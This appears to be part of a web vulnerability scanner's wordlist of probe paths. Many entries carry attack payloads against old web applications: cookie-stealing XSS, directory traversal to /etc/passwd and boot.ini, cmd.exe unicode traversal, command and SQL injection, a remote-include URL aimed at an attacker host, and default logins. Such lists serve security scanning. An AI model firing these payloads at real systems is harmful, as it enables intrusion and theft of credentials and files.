mambo/administrator/phpinfo.php
|
||
|
|
mambo/banners.php
|
||
|
|
mambo/index.php?Itemid=JUNK(5)
|
||
|
|
man.sh
|
||
|
|
man2html
|
||
|
|
manage/cgi/cgiproc
|
||
|
|
manage/login.asp+
|
||
|
|
manager/
|
||
|
|
manager/html-manager-howto.html
|
||
|
|
manager/manager-howto.html
|
||
|
|
mantis/summary_graph_functions.php?g_jpgraph_path=http%3A%2F%2Fattackershost%2Flistings.txt%3F
|
||
|
|
manual.php
|
||
|
|
manual/
|
||
|
|
manual/ag/esperfrm.htm
|
||
|
|
manual/images/
|
||
|
|
manual/servlets/scripts/servlet1/servform.htm
|
||
|
|
manual/servlets/scripts/shoes/shoeform.htm
|
||
|
|
market/
|
||
|
|
marketing/
|
||
|
|
master.password
|
||
|
|
mastergate/search.cgi?search=0&search_on=all
|
||
|
|
mbox
|
||
|
|
mc-icons/
|
||
|
|
mcartfree/database/metacart.mdb
|
||
|
|
megabook/admin.cgi?login=<script>alert('Vulnerable')</script>
|
||
|
|
megabook/files/20/setup.db
|
||
|
|
members.asp?SF=%22;}alert('Vulnerable');function%20x(){v%20=%22
|
||
|
|
members/
|
||
|
|
members/ID.pm
|
||
|
|
members/ID.xbb
|
||
|
|
message/
|
||
|
|
messaging/
|
||
|
|
meta.pl
|
||
|
|
metacart/database/metacart.mdb
|
||
|
|
mgrqcgi
|
||
|
|
midicart.mdb
|
||
|
|
migrate.nsf
|
||
|
|
mini_logger.cgi
|
||
|
|
minimal.exe
|
||
|
|
ministats/admin.cgi
|
||
|
|
misc/
|
||
|
|
mkilog.exe
|
||
|
|
mkplog.exe
|
||
|
|
mkstats/
|
||
|
|
mlog.html
|
||
|
|
mlog.phtml
|
||
|
|
mmstdod.cgi
|
||
|
|
mod.php
|
||
|
|
mod_ose_docs
|
||
|
|
modif/delete.php
|
||
|
|
modif/ident.php
|
||
|
|
modif_infos.asp?n=%60/etc/passwd%60
|
||
|
|
modif_infos.asp?n=....//....//....//....//....//....//....//etc.passwd
|
||
|
|
modif_infos.asp?n=../../../../../../../../../etc/passwd%00
|
||
|
|
modif_infos.asp?n=/....../boot.ini
|
||
|
|
modif_infos.asp?n=/.../.../.../.../.../.../boot.ini
|
||
|
|
modif_infos.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini
|
||
|
|
modif_infos.asp?n=/../../../../../../../../../etc/passwd
|
||
|
|
modif_infos.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini
|
||
|
|
modif_infos.asp?n=/etc/passwd
|
||
|
|
modif_infos.asp?n=/etc/passwd%00
|
||
|
|
modif_infos.asp?n=c:\boot.ini
|
||
|
|
mods/apage/apage.cgi?f=file.htm.|id|
|
||
|
|
modsecurity.php
|
||
|
|
modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index
|
||
|
|
modules.php?name=Classifieds&op=ViewAds&id_subcatg=75&id_catg=<script>alert('Vulnerable')</script>
|
||
|
|
modules.php?name=Downloads&d_op=viewdownload
|
||
|
|
modules.php?name=Downloads&d_op=viewdownloaddetails&lid=02&ttitle=<script>alert('Vulnerable')</script>
|
||
|
|
modules.php?name=Members_List&letter='%20OR%20pass%20LIKE%20'a%25'/*
|
||
|
|
modules.php?name=Members_List&sql_debug=1
|
||
|
|
modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
|
||
|
|
modules.php?name=Stories_Archive&sa=show_month&year=2002&month=03&month_l=<script>alert('Vulnerable')</script>
|
||
|
|
modules.php?name=Stories_Archive&sa=show_month&year=<script>alert('Vulnerable')</script>&month=3&month_l=test
|
||
|
|
modules.php?name=Surveys&pollID=<script>alert('Vulnerable')</script>
|
||
|
|
modules.php?name=Your_Account&op=userinfo&uname=<script>alert('Vulnerable')</script>
|
||
|
|
modules.php?name=Your_Account&op=userinfo&username=bla<script>alert(document.cookie)</script>
|
||
|
|
modules.php?op=modload&name=0&file=0
|
||
|
|
modules.php?op=modload&name=DMOZGateway&file=index&topic=<script>alert('Vulnerable')</script>
|
||
|
|
modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(document.cookie);%3E&parent_id=0
|
||
|
|
modules.php?op=modload&name=Guestbook&file=index&entry=<script>alert('Vulnerable')</script>
|
||
|
|
modules.php?op=modload&name=Members_List&file=index&letter=<script>alert('Vulnerable')</script>
|
||
|
|
modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script+>
|
||
|
|
modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script>
|
||
|
|
modules.php?op=modload&name=News&file=index&catid=&topic=><script>alert('Vulnerable');</script>;
|
||
|
|
modules.php?op=modload&name=Sections&file=index&req=viewarticle&artid=
|
||
|
|
modules.php?op=modload&name=WebChat&file=index&roomid=<script>alert('Vulnerable')</script>
|
||
|
|
modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink
|
||
|
|
modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=<script>alert('Vulnerable')</script>
|
||
|
|
modules.php?op=modload&name=Wiki&file=index&pagename=<script>alert('Vulnerable')</script>
|
||
|
|
modules.php?op=modload&name=Xforum&file=<script>alert('Vulnerable')</script>&fid=2
|
||
|
|
modules.php?op=modload&name=Xforum&file=member&action=viewpro&member=<script>alert('Vulnerable')</script>
|
||
|
|
modules.php?op=modload&name=books&file=index&req=search&query=|script|alert(document.cookie)|/script|
|
||
|
|
modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../../../../etc/passwd
|
||
|
|
modules/Downloads/voteinclude.php+
|
||
|
|
modules/Forums/attachment.php
|
||
|
|
modules/Forums/bb_smilies.php?Default_Theme=<script>alert('Vulnerable')</script>
|
||
|
|
modules/Forums/bb_smilies.php?bgcolor1=\"><script>alert('Vulnerable')</script>
|
||
|
|
modules/Forums/bb_smilies.php?name=<script>alert('Vulnerable')</script>
|
||
|
|
modules/Forums/bb_smilies.php?site_font=}--></style><script>alert('Vulnerable')</script>
|
||
|
|
modules/Search/index.php
|
||
|
|
modules/Submit/index.php?op=pre&title=<script>alert(document.cookie);</script>
|
||
|
|
modules/WebChat/in.php+
|
||
|
|
modules/WebChat/out.php
|
||
|
|
modules/WebChat/quit.php
|
||
|
|
modules/WebChat/users.php
|
||
|
|
modules/Your_Account/navbar.php+
|
||
|
|
moin.cgi?test
|
||
|
|
mojo/mojo.cgi
|
||
|
|
moregroupware/modules/webmail2/inc/
|
||
|
|
movimientos/
|
||
|
|
mp3/
|
||
|
|
mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb
|
||
|
|
mqseries/
|
||
|
|
mrtg.cfg?cfg=../../../../../../../../etc/passwd
|
||
|
|
mrtg.cgi?cfg=../../../../../../../../etc/passwd
|
||
|
|
mrtg.cgi?cfg=blah
|
||
|
|
ms_proxy_auth_query/
|
||
|
|
msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
|
||
|
|
msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c
|
||
|
|
msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
|
||
|
|
msadc/Samples/SELECTOR/showcode.asp?|-|0|404_Object_Not_Found
|
||
|
|
msadc/Samples/selector/showcode.asp?source=/msadc/Samples/../../../../../../../../../winnt/win.ini
|
||
|
|
msadc/msadcs.dll
|
||
|
|
msadc/samples/adctest.asp
|
||
|
|
msadm/domain/index.php3?account_name=\"><script>alert('Vulnerable')</script>
|
||
|
|
msadm/site/index.php3?authid=\"><script>alert('Vulnerable')</script>
|
||
|
|
msadm/user/login.php3?account_name=\"><script>alert('Vulnerable')</script>
|
||
|
|
msdwda.nsf
|
||
|
|
mspress30/
|
||
|
|
msql/
|
||
|
|
msword/
|
||
|
|
mt-static/
|
||
|
|
mt-static/mt-check.cgi
|
||
|
|
mt-static/mt-load.cgi
|
||
|
|
mt-static/mt.cfg
|
||
|
|
mt/
|
||
|
|
mt/mt-check.cgi
|
||
|
|
mt/mt-load.cgi
|
||
|
|
mt/mt.cfg
|
||
|
|
mtatbls.nsf
|
||
|
|
mtdata/mtstore.nsf
|
||
|
|
mtstore.nsf
|
||
|
|
multihtml.pl?multi=/etc/passwd%00html
|
||
|
|
musicqueue.cgi
|
||
|
|
myguestBk/add1.asp?|-|0|404_Object_Not_Found
|
||
|
|
myguestBk/admin/delEnt.asp?id=NEWSNUMBER|-|0|404_Object_Not_Found
|
||
|
|
myguestBk/admin/index.asp?|-|0|404_Object_Not_Found
|
||
|
|
myguestbook.cgi?action=view
|
||
|
|
myhome.php?action=messages&box=<script>alert('Vulnerable')</script>
|
||
|
|
myinvoicer/config.inc
|
||
|
|
mylog.html?screen=/etc/passwd
|
||
|
|
mylog.phtml?screen=/etc/passwd
|
||
|
|
myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent
|
||
|
|
myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query=
|
||
|
|
mysql/db_details_importdocsql.php?submit_show=true&do=import&docpath=../../../../../../../etc
|
||
|
|
na_admin/
|
||
|
|
na_admin/ataglance.html
|
||
|
|
namazu.cgi
|
||
|
|
names.nsf
|
||
|
|
nav/cList.php?root=</script><script>alert('Vulnerable')/<script>
|
||
|
|
nbmember.cgi?cmd=list_all_users
|
||
|
|
ncl_items.html
|
||
|
|
ncl_items.shtml?SUBJECT=1
|
||
|
|
ncommerce3/ExecMacro/macro.d2w/%0a%0a
|
||
|
|
ncommerce3/ExecMacro/macro.d2w/NOEXISTINGHTMLBLOCK
|
||
|
|
netauth.cgi?cmd=show&page=../../../../../../../../../../etc
|
||
|
|
netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd
|
||
|
|
netbasic/websinfo.bas
|
||
|
|
netget?sid=Safety&msg=2002&file=Safety
|
||
|
|
netget?sid=user&msg=300&file=../../../../../../../../../../etc/passwd
|
||
|
|
netget?sid=user&msg=300&file=../../../../../../../../../boot.ini
|
||
|
|
nethome/
|
||
|
|
netpad.cgi
|
||
|
|
netscape/
|
||
|
|
netutils/findata.stm?host=<script>alert(document.cookie)</script>
|
||
|
|
netutils/findata.stm?user=<script>alert(document.cookie)</script>
|
||
|
|
netutils/ipdata.stm?ipaddr=<script>alert(document.cookie)</script>
|
||
|
|
netutils/whodata.stm?sitename=<script>alert(document.cookie)</script>
|
||
|
|
new
|
||
|
|
new/
|
||
|
|
news
|
||
|
|
news/news.mdb
|
||
|
|
newsdesk.cgi?t=../../../../../../../../../../etc
|
||
|
|
newsdesk.cgi?t=../../../../../../../../../../etc/passwd
|
||
|
|
newtopic.php
|
||
|
|
newuser?Image=../../database/rbsserv.mdb
|
||
|
|
nikto.ida
|
||
|
|
nimages.php
|
||
|
|
nl/
|
||
|
|
nlog-smb.cgi
|
||
|
|
nlog-smb.pl
|
||
|
|
nntp/nd000000.nsf
|
||
|
|
nntp/nd000001.nsf
|
||
|
|
nntp/nd000002.nsf
|
||
|
|
nntp/nd000003.nsf
|
||
|
|
nntp/nd000004.nsf
|
||
|
|
nntppost.nsf
|
||
|
|
node/view/666\"><script>alert(document.domain)</script>
|
||
|
|
non-existent.pl
|
||
|
|
noshell
|
||
|
|
nosuchurl/><script>alert('Vulnerable')</script>
|
||
|
|
notes.nsf
|
||
|
|
noticias/
|
||
|
|
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
|
||
|
|
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../etc/passwd%00
|
||
|
|
nph-error.pl
|
||
|
|
nph-exploitscanget.cgi
|
||
|
|
nph-maillist.pl
|
||
|
|
nph-publish
|
||
|
|
nph-publish.cgi
|
||
|
|
nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0
|
||
|
|
nph-showlogs.pl?files=../../../../../../../../etc/&filter=.*&submit=Go&linecnt=500&refresh=0
|
||
|
|
nph-showlogs.pl?files=../../../../../../../../etc/passwd&filter=.*&submit=Go&linecnt=500&refresh=0
|
||
|
|
nph-test-cgi
|
||
|
|
nphp/nphpd.php
|
||
|
|
npn_admn.nsf
|
||
|
|
npn_rn.nsf
|
||
|
|
ns-icons/
|
||
|
|
nsn/..%5Cutil/attrib.bas
|
||
|
|
nsn/..%5Cutil/chkvol.bas
|
||
|
|
nsn/..%5Cutil/copy.bas
|
||
|
|
nsn/..%5Cutil/del.bas
|
||
|
|
nsn/..%5Cutil/dir.bas
|
||
|
|
nsn/..%5Cutil/dsbrowse.bas
|
||
|
|
nsn/..%5Cutil/glist.bas
|
||
|
|
nsn/..%5Cutil/lancard.bas
|
||
|
|
nsn/..%5Cutil/md.bas
|
||
|
|
nsn/..%5Cutil/rd.bas
|
||
|
|
nsn/..%5Cutil/ren.bas
|
||
|
|
nsn/..%5Cutil/send.bas
|
||
|
|
nsn/..%5Cutil/set.bas
|
||
|
|
nsn/..%5Cutil/slist.bas
|
||
|
|
nsn/..%5Cutil/type.bas
|
||
|
|
nsn/..%5Cutil/userlist.bas
|
||
|
|
nsn/..%5Cweb/env.bas
|
||
|
|
nsn/..%5Cweb/fdir.bas
|
||
|
|
nsn/..%5Cwebdemo/env.bas
|
||
|
|
nsn/..%5Cwebdemo/fdir.bas
|
||
|
|
nsn/env.bas
|
||
|
|
nsn/fdir.bas
|
||
|
|
nsn/fdir.bas:ShowVolume
|
||
|
|
ntitar.pl
|
||
|
|
ntsync4.nsf
|
||
|
|
ntsync45.nsf
|
||
|
|
nuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
|
||
|
|
nul..cfm
|
||
|
|
nul..dbm
|
||
|
|
nul.cfm
|
||
|
|
nul.dbm
|
||
|
|
null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full
|
||
|
|
oc/Search/SQLQHit.asp
|
||
|
|
oc/Search/sqlqhit.asp
|
||
|
|
odbc/
|
||
|
|
oekaki/
|
||
|
|
oem_webstage/cgi-bin/oemapp_cgi
|
||
|
|
oem_webstage/oem.conf
|
||
|
|
officescan/cgi/cgiChkMasterPwd.exe
|
||
|
|
officescan/cgi/jdkRqNotify.exe
|
||
|
|
officescan/hotdownload/ofscan.ini
|
||
|
|
ojspdemos/basic/hellouser/hellouser.jsp
|
||
|
|
ojspdemos/basic/simple/usebean.jsp
|
||
|
|
ojspdemos/basic/simple/welcomeuser.jsp
|
||
|
|
old/
|
||
|
|
open?
|
||
|
|
openautoclassifieds/friendmail.php?listing=<script>alert(document.domain);</script>
|
||
|
|
openautoclassifieds/friendmail.php?listing=<script>alert(document.domain);</script>
|
||
|
|
opendir.php?/etc/passwd
|
||
|
|
opendir.php?requesturl=/etc/passwd
|
||
|
|
oprocmgr-status
|
||
|
|
options.inc.php+
|
||
|
|
options.php?optpage=<script>alert('Vulnerable!')</script>
|
||
|
|
oracle
|
||
|
|
oradata/
|
||
|
|
order/
|
||
|
|
order/order_log.dat
|
||
|
|
order/order_log_v12.dat
|
||
|
|
orders/
|
||
|
|
orders/checks.txt
|
||
|
|
orders/mountain.cfg
|
||
|
|
orders/order_log.dat
|
||
|
|
orders/order_log_v12.dat
|
||
|
|
orders/orders.log
|
||
|
|
orders/orders.txt
|
||
|
|
oscommerce/default.php
|
||
|
|
outgoing/
|
||
|
|
owa_util%2esignature
|
||
|
|
ows-bin/oaskill.exe?abcde.exe
|
||
|
|
ows-bin/oasnetconf.exe?-l%20-s%20BlahBlah
|
||
|
|
ows-bin/perlidlc.bat?&dir
|
||
|
|
ows/
|
||
|
|
ows/restricted%2eshow
|
||
|
|
pafiledb/includes/team/file.php
|
||
|
|
page.cgi?../../../../../../../../../../etc/passwd
|
||
|
|
pagelog.cgi
|
||
|
|
pages/
|
||
|
|
pages/htmlos/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
|
||
|
|
pals-cgi?palsAction=restart&documentName=/etc/passwd
|
||
|
|
parse-file
|
||
|
|
parse_xml.cgi
|
||
|
|
pass
|
||
|
|
pass_done.php
|
||
|
|
passwd
|
||
|
|
passwd.adjunct
|
||
|
|
passwd.txt
|
||
|
|
passwdfile
|
||
|
|
password
|
||
|
|
password.inc
|
||
|
|
password/
|
||
|
|
passwords.txt
|
||
|
|
passwords/
|
||
|
|
path/nw/article.php?id='
|
||
|
|
pbcgi.cgi?name=Joe%Camel&email=%3C
|
||
|
|
pbcgi.cgi?name=Joe%Camel&email=%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3B%3C%2FSCRIPT%3E
|
||
|
|
pbserver/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
|
||
|
|
pbserver/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
|
||
|
|
pbserver/pbserver.dll
|
||
|
|
pccsmysqladm/incs/dbconnect.inc
|
||
|
|
pdf/
|
||
|
|
people.list
|
||
|
|
perl
|
||
|
|
perl-status
|
||
|
|
perl.exe
|
||
|
|
perl.exe?-v
|
||
|
|
perl/
|
||
|
|
perl/-e%20%22system('cat%20/etc/passwd');\%22
|
||
|
|
perl/-e%20print%20Hello
|
||
|
|
perl/env.pl
|
||
|
|
perl/files.pl
|
||
|
|
perl/printenv
|
||
|
|
perl/samples/env.pl
|
||
|
|
perl/samples/lancgi.pl
|
||
|
|
perl/samples/ndslogin.pl
|
||
|
|
perl/samples/volscgi.pl
|
||
|
|
perl5/
|
||
|
|
perl5/files.pl
|
||
|
|
perl?-v
|
||
|
|
perlshop.cgi
|
||
|
|
perweb.nsf
|
||
|
|
pfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|'
|
||
|
|
pfdispaly.cgi?../../../../../../../../../../etc
|
||
|
|
pfdispaly.cgi?../../../../../../../../../../etc/passwd
|
||
|
|
pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|'
|
||
|
|
pforum/edituser.php?boardid=&agree=1&username=%3Cscript%3Ealert('Vulnerable')%3C/script%3E&nickname=test&email=test@example.com&pwd=test&pwd2=test&filled=1
|
||
|
|
phf
|
||
|
|
phf.cgi?QALIA
|
||
|
|
phf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd
|
||
|
|
phf?Qname=root%0Acat%20/etc/passwd%20
|
||
|
|
phorum/admin/footer.php?GLOBALS[message]=<script>alert('Vulnerable')</script>
|
||
|
|
phorum/admin/header.php?GLOBALS[message]=<script>alert('Vulnerable')</script>
|
||
|
|
phorum/admin/stats.php
|
||
|
|
photo/
|
||
|
|
photo/manage.cgi
|
||
|
|
photo/protected/manage.cgi
|
||
|
|
photo_album/apa_phpinclude.inc.php
|
||
|
|
photodata/
|
||
|
|
photodata/manage.cgi
|
||
|
|
php-cgi
|
||
|
|
php-coolfile/action.php?action=edit&file=config.php
|
||
|
|
php.cgi?/etc/passwd
|
||
|
|
php.ini
|
||
|
|
php/
|
||
|
|
php/gaestebuch/admin/index.php
|
||
|
|
php/index.php
|
||
|
|
php/mlog.html
|
||
|
|
php/mlog.phtml
|
||
|
|
php/mylog.html?screen=/etc/passwd
|
||
|
|
php/mylog.phtml?screen=/etc/passwd
|
||
|
|
php/php.exe?c:\boot.ini
|
||
|
|
php/php.exe?c:\winnt\boot.ini
|
||
|
|
php/php4ts.dll
|
||
|
|
phpBB/phpinfo.php
|
||
|
|
phpBB/viewtopic.php?t=17071&highlight=\">\"<script>javascript:alert(document.cookie)</script>
|
||
|
|
phpBB/viewtopic.php?topic_id=<script>alert('Vulnerable')</script>
|
||
|
|
phpBB2/includes/db.php
|
||
|
|
phpBB2/search.php?search_id=1\
|
||
|
|
phpEventCalendar/file_upload.php
|
||
|
|
phpMyAdmin/
|
||
|
|
phpclassifieds/latestwap.php?url=<script>alert('Vulnerable');</script>
|
||
|
|
phpimageview.php?pic=javascript:alert('Vulnerable')
|
||
|
|
phpinfo.php
|
||
|
|
phpinfo.php3
|
||
|
|
phpinfo.php3?VARIABLE=<script>alert('Vulnerable')</script>
|
||
|
|
phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>
|
||
|
|
phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script>
|
||
|
|
phpinfo.php?cx[]=JUNK(4096)<script>alert(foo)</script>
|
||
|
|
phpmyadmin/
|
||
|
|
phpnuke/html/.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
|
||
|
|
phpnuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
|
||
|
|
phpping/index.php?pingto=www.test.com%20|%20dir%20c:\
|
||
|
|
phprank/add.php?page=add&spass=1&name=2&siteurl=3&email=%3Cscript%3Ealert(Vulnerable)%3C/script%3E
|
||
|
|
phprocketaddin/?page=../../../../../../../../../../boot.ini
|
||
|
|
phprocketaddin/?page=../../../../../../../../../../etc/passwd
|
||
|
|
phpshare/phpshare.php
|
||
|
|
phptonuke.php?filnavn=/etc/passwd
|
||
|
|
phptonuke.php?filnavn=<script>alert('Vulnerable')</script>
|
||
|
|
phpwebchat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script>
|
||
|
|
phpwebfilemgr/index.php?f=../../../../../../../../../etc
|
||
|
|
phpwebfilemgr/index.php?f=../../../../../../../../../etc/passwd
|
||
|
|
phpwebsite/index.php?module=calendar&calendar[view]=day&month=2&year=2003&day=1+%00\"><script>alert('Vulnerable')</script>
|
||
|
|
phpwebsite/index.php?module=calendar&calendar[view]=day&year=2003%00-1&month=
|
||
|
|
phpwebsite/index.php?module=fatcat&fatcat[user]=viewCategory&fatcat_id=1%00+\"><script>alert('Vulnerable')</script>
|
||
|
|
phpwebsite/index.php?module=pagemaster&PAGE_user_op=view_page&PAGE_id=10\"><script>alert('Vulnerable')</script>&MMN_position=[X:X]
|
||
|
|
phpwebsite/index.php?module=search&SEA_search_op=continue&PDA_limit=10\"><script>alert('Vulnerable')</script>
|
||
|
|
pics/
|
||
|
|
piranha/secure/passwd.php3
|
||
|
|
pix/
|
||
|
|
pks/lookup
|
||
|
|
pls/admin
|
||
|
|
pls/dadname/htp.print?cbuf=<script>alert('Vulnerable')</script>
|
||
|
|
pls/help/<script>alert('Vulnerable')</script>
|
||
|
|
pls/ldc/admin_/
|
||
|
|
pls/portal/CXTSYS.DRILOAD.VALIDATE_STMT
|
||
|
|
pls/portal/HTP.PRINT
|
||
|
|
pls/portal/PORTAL.home
|
||
|
|
pls/portal/PORTAL.wwa_app_module.link
|
||
|
|
pls/portal/PORTAL.wwv_dynxml_generator.show
|
||
|
|
pls/portal/PORTAL.wwv_form.genpopuplist
|
||
|
|
pls/portal/PORTAL.wwv_main.render_warning_screen?p_oldurl=inTellectPRO&p_newurl=inTellectPRO
|
||
|
|
pls/portal/PORTAL.wwv_setting.render_css
|
||
|
|
pls/portal/PORTAL.wwv_ui_lovf.show
|
||
|
|
pls/portal/PORTAL_DEMO.ORG_CHART.SHOW
|
||
|
|
pls/portal/SELECT
|
||
|
|
pls/portal/null
|
||
|
|
pls/portal/owa_util.cellsprint?p_theQuery=select
|
||
|
|
pls/portal/owa_util.cellsprint?p_theQuery=select+*+from+sys.dba_users
|
||
|
|
pls/portal/owa_util.listprint?p_theQuery=select
|
||
|
|
pls/portal/owa_util.show_query_columns?ctable=sys.dba_users
|
||
|
|
pls/portal/owa_util.showsource?cname=owa_util
|
||
|
|
pls/portal/owa_util.signature
|
||
|
|
pls/portal30/admin_/
|
||
|
|
pls/sample/admin_/help/..%255cplsql.conf
|
||
|
|
pls/simpledad/admin_/
|
||
|
|
pls/simpledad/admin_/adddad.htm?%3CADVANCEDDAD%3E
|
||
|
|
pls/simpledad/admin_/dadentries.htm
|
||
|
|
pls/simpledad/admin_/gateway.htm?schema=sample
|
||
|
|
pls/simpledad/admin_/globalsettings.htm
|
||
|
|
plusmail
|
||
|
|
pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:alert('Vulnerable')&message=MESSAGE&submitpm=Submit
|
||
|
|
pm/lib.inc.php
|
||
|
|
pm_buddy_list.asp?name=A&desc=B%22%3E<script>alert('Vulnerable')</script>%3Ca%20s=%22&code=1
|
||
|
|
pmlite.php
|
||
|
|
pms.php?action=send&recipient=DESTINATAIRE&subject=happy&posticon=javascript:alert('Vulnerable')&mode=0&message=Hello
|
||
|
|
poll
|
||
|
|
pollit/Poll_It_
|
||
|
|
pollit/Poll_It_SSI_v2.0.cgi?data_dir=\etc\passwd%00
|
||
|
|
polls
|
||
|
|
pollssi.cgi
|
||
|
|
poppassd.php3+
|
||
|
|
porn/
|
||
|
|
post-query
|
||
|
|
post16.exe
|
||
|
|
post32.exe|dir%20c:\\
|
||
|
|
post_query
|
||
|
|
postcards.cgi
|
||
|
|
postinfo.html
|
||
|
|
postnuke/html/index.php?module=My_eGallery
|
||
|
|
postnuke/html/modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script>
|
||
|
|
postnuke/index.php?module=My_eGallery
|
||
|
|
postnuke/modules.php?op=modload&name=Web_Links&file=index&req=viewlinkdetails&lid=666&ttitle=Mocosoft
|
||
|
|
powerup/r.cgi?FILE=../../../../../../../../../../etc/passwd
|
||
|
|
powerup/r.cgi?FILE=../../../../../../../../../../passwd
|
||
|
|
pp.php?action=login
|
||
|
|
ppdscgi.exe
|
||
|
|
pr0n/
|
||
|
|
prd.i/pgen/
|
||
|
|
printenv
|
||
|
|
printenv.tmp
|
||
|
|
privado/
|
||
|
|
private.nsf
|
||
|
|
private/
|
||
|
|
probecontrol.cgi?command=enable&username=cancer&password=killer
|
||
|
|
processit.pl
|
||
|
|
prod/
|
||
|
|
produccart/pdacmin/login.asp?|-|0|404_Object_Not_Found
|
||
|
|
product_info.php
|
||
|
|
productcart/database/EIPC.mdb
|
||
|
|
productcart/pc/Custva.asp?|-|0|404_Object_Not_Found
|
||
|
|
profile.cgi
|
||
|
|
profile.php?u=JUNK(8)
|
||
|
|
profiles.php?uid=<script>alert(document.cookie)</script>
|
||
|
|
profiles.php?what=contact&author=ich&authoremail=bla%40bla.com&subject=hello&message=text&uid=<script>alert(document.cookie)</script>
|
||
|
|
project/index.php?m=projects&user_cookie=1
|
||
|
|
prometheus-all/index.php
|
||
|
|
pron/
|
||
|
|
proplus/admin/login.php+-d+\"action=insert\"+-d+\"username=test\"+-d+\"password=test\"
|
||
|
|
protected/
|
||
|
|
protected/secret.html+
|
||
|
|
protectedpage.php?uid='%20OR%20''='&pwd='%20OR%20''='
|
||
|
|
protection.php
|
||
|
|
proxy/ssllogin?user=administrator&password=administrator
|
||
|
|
proxy/ssllogin?user=administrator&password=operator
|
||
|
|
proxy/ssllogin?user=administrator&password=user
|
||
|
|
prueba/
|
||
|
|
pruebas/
|
||
|
|
prxdocs/misc/prxrch.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
|
||
|
|
pt_config.inc
|
||
|
|
ptg_upgrade_pkg.log
|
||
|
|
pu3.pl
|
||
|
|
pub/
|
||
|
|
pub/english.cgi?op=rmail
|
||
|
|
public.nsf
|
||
|
|
public/
|
||
|
|
publica/
|
||
|
|
publicar/
|
||
|
|
publico/
|
||
|
|
publisher/
|
||
|
|
publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10
|
||
|
|
purchase/
|
||
|
|
purchases/
|
||
|
|
put/cgi-bin/putport.exe?SWAP&BOM&OP=none&Lang=en-US&PutHtml=../../../../../../../../etc/passwd
|
||
|
|
pvote/add.php?question=AmIgAy&o1=yes&o2=yeah&o3=well..yeah&o4=bad%20
|
||
|
|
pvote/ch_info.php?newpass=password&confirm=password%20
|
||
|
|
pvote/del.php?pollorder=1%20
|
||
|
|
pw/
|
||
|
|
pw/storemgr.pw
|
||
|
|
pwd.db
|
||
|
|
python/
|
||
|
|
qpadmin.nsf
|
||
|
|
query
|
||
|
|
query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
|
||
|
|
query?mss=%2e%2e/config
|
||
|
|
quickplace/quickplace/main.nsf
|
||
|
|
quickstart/qstart50.nsf
|
||
|
|
quickstart/wwsample.nsf
|
||
|
|
quickstore.cgi?page=../../../../../../../../../../etc
|
||
|
|
quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id=
|
||
|
|
quikmail/nph-emumail.cgi?type=../%00
|
||
|
|
quikstore.cfg
|
||
|
|
quikstore.cgi
|
||
|
|
quizme.cgi
|
||
|
|
r.cgi?FILE=../../../../../../../../../../etc
|
||
|
|
r.cgi?FILE=../../../../../../../../../../etc/passwd
|
||
|
|
ratlog.cgi
|
||
|
|
reademail.pl
|
||
|
|
readme
|
||
|
|
readme.eml
|
||
|
|
readme.nsf
|
||
|
|
readme.txt
|
||
|
|
readmec.nsf
|
||
|
|
readmes.nsf
|
||
|
|
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3C%2FSCRIPT%3E
|
||
|
|
redirect
|
||
|
|
register.cgi
|
||
|
|
register/
|
||
|
|
registered/
|
||
|
|
replicator/webpage.cgi/
|
||
|
|
replymsg.php?send=1&destin=<script>alert('Vulnerable')</script>
|
||
|
|
reports.nsf
|
||
|
|
reports/
|
||
|
|
reports/rwservlet
|
||
|
|
reports/rwservlet/getjobid4?server=myrep
|
||
|
|
reports/rwservlet/getjobid7?server=myrep
|
||
|
|
reports/rwservlet/showenv
|
||
|
|
reports/rwservlet/showjobs
|
||
|
|
reports/rwservlet/showmap
|
||
|
|
reports/rwservlet/showmap?server=myserver
|
||
|
|
reports/rwservlet?server=repserv+report=/tmp/hacker.rdf+destype=cache+desformat=PDF
|
||
|
|
reports/temp/
|
||
|
|
